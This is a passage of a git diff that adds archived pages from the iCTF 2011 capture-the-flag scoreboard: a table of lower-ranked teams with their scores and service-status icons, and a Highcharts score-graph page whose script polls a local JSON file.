src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>60</td><td><img width="20px" height="="20px"" src="153.jpg"><b> UCLions </b></td><td>US <img src="us.png"></td><td><b>7.6</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>61</td><td><img width="20px" height="="20px"" src="204.jpg"><b> GoatLove </b></td><td>US <img src="us.png"></td><td><b>4.5</b></td><td>554</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>62</td><td><img width="20px" height="="20px"" src="136.jpg"><b> utdCSG </b></td><td>US <img src="us.png"></td><td><b>4.0</b></td><td>3</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>63</td><td><img width="20px" height="="20px"" src="193.jpg"><b> MUM </b></td><td>US <img src="us.png"></td><td><b>2.2</b></td><td>1187</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>64</td><td><img width="20px" height="="20px"" src="149.jpg"><b> NorseR@g3 </b></td><td>US <img src="us.png"></td><td><b>0.9</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>65</td><td><img width="20px" height="="20px"" src="133.jpg"><b> InKryptz </b></td><td>IN <img src="in.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>66</td><td><img width="20px" height="="20px"" src="137.jpg"><b> A Finite Number of Monkeys </b></td><td>GB <img src="gb.png"></td><td><b>0.0</b></td><td>1734</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>67</td><td><img width="20px" height="="20px"" src="148.jpg"><b> Occupy Ring0 </b></td><td>CA <img src="ca.png"></td><td><b>0.0</b></td><td>1095</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>68</td><td><img width="20px" height="="20px"" src="200.jpg"><b> bios </b></td><td>IN <img src="in.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>69</td><td><img width="20px" height="="20px"" src="174.jpg"><b> hack_club </b></td><td>RU <img src="ru.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>70</td><td><img width="20px" height="="20px"" src="188.jpg"><b> XLII </b></td><td>BR <img src="br.png"></td><td><b>0.0</b></td><td>293</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>71</td><td><img width="20px" height="="20px"" src="190.jpg"><b> WCSC </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>588</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>72</td><td><img width="20px" height="="20px"" src="163.jpg"><b> SYNNERS </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>73</td><td><img width="20px" height="="20px"" src="165.jpg"><b> bitmap </b></td><td>RU <img src="ru.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>74</td><td><img width="20px" height="="20px"" src="180.jpg"><b> The Chuck Norrisses </b></td><td>CA <img src="ca.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>75</td><td><img width="20px" height="="20px"" src="167.jpg"><b> Harimeow Malaya </b></td><td>MY <img src="my.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>76</td><td><img width="20px" height="="20px"" src="168.jpg"><b> Sentinel </b></td><td>MY <img src="my.png"></td><td><b>0.0</b></td><td>174</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>77</td><td><img width="20px" height="="20px"" src="169.jpg"><b> ITHasBeenUS </b></td><td>CA <img src="ca.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>78</td><td><img width="20px" height="="20px"" src="171.jpg"><b> LIST </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>1094</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>79</td><td><img width="20px" height="="20px"" src="213.jpg"><b> 005-3 </b></td><td>RU <img src="ru.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>80</td><td><img width="20px" height="="20px"" src="210.jpg"><b> shell-storm </b></td><td>FR <img src="fr.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>81</td><td><img width="20px" height="="20px"" src="155.jpg"><b> Phi </b></td><td>SG <img src="sg.png"></td><td><b>0.0</b></td><td>142</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>82</td><td><img width="20px" height="="20px"" src="209.jpg"><b> PwningYeti </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>248</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>83</td><td><img width="20px" height="="20px"" src="172.jpg"><b> C.o.P </b></td><td>FR <img src="fr.png"></td><td><b>0.0</b></td><td>1912</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>84</td><td><img width="20px" height="="20px"" src="205.jpg"><b> Dakota State University </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>987</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>85</td><td><img width="20px" height="="20px"" src="203.jpg"><b> TeamSheep </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>145</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>86</td><td><img width="20px" height="="20px"" src="211.jpg"><b> WTF </b></td><td>RU <img src="ru.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>87</td><td><img width="20px" height="="20px"" src="214.jpg"><b> Pwn State </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr></tbody></table> +</div> + + +</body></html> +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/score-graph.html b/ictf2011/scoreboard.ictf2011_end.info_files/score-graph.html @@ -0,0 +1,93 @@ +<!DOCTYPE html> +<!-- saved from url=(0048)http://scoreboard.ictf2011.info/score-graph.html --> +<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> + +<title>iCTF 2011 Score Graph</title> + +<script type="text/javascript" src="jquery.min.js"></script> +<script type="text/javascript" src="highcharts.js"></script> +<script type="text/javascript" src="exporting.js"></script> +<script type="text/javascript" src="gray.js"></script> + +<script type="text/javascript"> +var chart; +function UpdateGraph(destroy) +{ +$.getJSON("json/score_graph.json",function(data) +{ +if(destroy) +{ + chart.destroy(); + delete chart; + chart = new Highcharts.Chart(option); +} +$.each(data.scores,function(i,s){ + if(i>9) + { + return; + } + chart.addSeries(s,false); + +}); +chart.redraw(); +}); +} + +$(document).ready(function() { +option = { +chart: { + renderTo: 'container', + defaultSeriesType: 'line', + zoomType: 'x', +}, +credits: {enabled: false}, +title: { + text: 'iCTF 2011 Score', + x: -20 //center +}, +subtitle: { + text: 'http://ictf2011.info', + x: -20 +}, +xAxis: { + title: { text: 'Ticks' }, +}, +yAxis: { + title: { + text: 'Points' + }, + plotLines: [{ + value: 0, + width: 1, + color: '#808080' + }] +}, +tooltip: { + formatter: function() { + return '<b>'+ this.series.name +'</b> : '+ + this.y +'<br/>( at tick '+ this.x+' )'; + } +}, +legend: { + layout: 'vertical', + align: 'right', + verticalAlign: 'top', + x: -10, + y: 100, + borderWidth: 0 +}, +}; +chart = new Highcharts.Chart(option); +UpdateGraph(0); +setInterval("UpdateGraph(1)",30000); +}); +// Apply the theme +var highchartsOptions = Highcharts.setOptions(Highcharts.theme); +</script> +</head><style type="text/css" style="display: none !important; ">/*This block of style rules is inserted by AdBlock*/#FFN_Banner_Holder,#FFN_imBox_Container,#RadAd_Skyscraper,#ab_pointer,#adxLeaderboard,#bbccom_leaderboard,#center_banner,#dir_ads_site,#flashad,#footer_adcode,#hbBHeaderSpon,#hiddenHeaderSpon,#navbar_adcode,#p360-format-box,#rightAds,#rightcolumn_adcode,#rm_container,#tads table[align="center"][width="100%"],#tooltipbox[class^="itxt"],#top-advertising,#topMPU,#tracker_advertorial,#ve_threesixty_swf[name="ve_threesixty_swf"],.ad-now,.ad_marquee,.dfpad,.kLink span[id^="preLoadWrap"].preLoadWrap,.prWrap,[id^="ad_block"],[id^="adbrite"],[id^="dclkAds"],[id^="ew"][id$="_bannerDiv"],[id^="konaLayer"],[src*="sixsigmatraffic.com"],a[href^="http://ad."][href*=".doubleclick.net/"],a[href^="http://adserver.adpredictive.com"],div[class^="dms_ad_IDS"],div[id^="adKontekst_"],div[id^="google_ads_div"],div[id^="kona_"][id$="_wrapper"],div[id^="sponsorads"],div[id^="y5_direct"],embed[flashvars*="AdID"],iframe[id^="dapIfM"],iframe[id^="etarget"][id$="banner"],iframe[name^="AdBrite"],iframe[name^="google_ads_"],img[src^="http://cdn.adnxs.com"],script[src="//pagead2.googleadservices.com/pagead/show_ads.js"] + ins > ins > iframe,script[src="http://pagead2.googlesyndication.com/pagead/show_ads.js"] + ins > ins > iframe,table[cellpadding="0"][width="100%"] > * > * > * > 